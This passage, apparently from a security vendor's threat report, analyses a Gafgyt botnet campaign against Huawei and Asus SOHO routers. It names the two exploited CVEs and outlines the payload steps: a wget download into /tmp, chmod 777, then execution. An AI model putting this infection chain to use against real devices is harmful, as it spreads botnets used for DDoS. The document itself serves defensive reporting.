Gafgyt (also known as Bashlite) is one of the most common types of malware infecting IoT devices, and has been active since 2014. A new variant of this notorious malware continues to target small office and home office (SOHO) routers from well-known brands, including Huawei and Asus. Gafgyt’s core functionality remains the same, that is, attacking IoT devices with multiple hardcoded exploits in order to take control and harness their power for DDoS attacks. However, for this new campaign the Gafgyt author has introduced techniques designed to remove rival IoT malware.
- This Gafgyt campaign targets 48 different malware variants in an attempt to spread further than previous iterations of the malware.
- 56% of the malware species on the kill list are known rival IoT botnets (thingbots).
- Huawei HG532 and Asus routers are targeted in this new campaign through known vulnerabilities released in 2017 and 2018: CVE-2017-172151 and CVE-2018-15887.2
- Gafgyt DoS attacks target game servers, specifically Valve Source Engine servers, which is in line with the age demographic we’ve seen creating IoT botnets.
- The Dropzone server IP is located in the US, inside the Hostwind hosting provider network.
Stage 1: SOHO Router Targeting via RCE CVEs with Exploits
In this campaign, Gafgyt is targeting the following Huawei and Asus routers:
Gafgyt uses two Remote Code Execution (RCE) vulnerabilities, both of which are more than a year old, to exploit targeted SOHO routers:
- CVE-2017-17215 (Huawei): A Remote Code Execution (RCE) vulnerability allowing an authenticated attacker to send malicious packets to the Universal Plug and Play (UPnP) service port 37215 to launch attacks.
- CVE-2018-15887 (Asus): An RCE vulnerability that allows an authenticated remote attacker to execute arbitrary OS commands via service parameters.
Following the exploitation of the vulnerabilities, Gafgyt:
- Downloads the payload using “wget” command
- Stores the payload in “/tmp” directory
- Makes the payload accessible using “chmod 777 <filename>”
- Runs the payload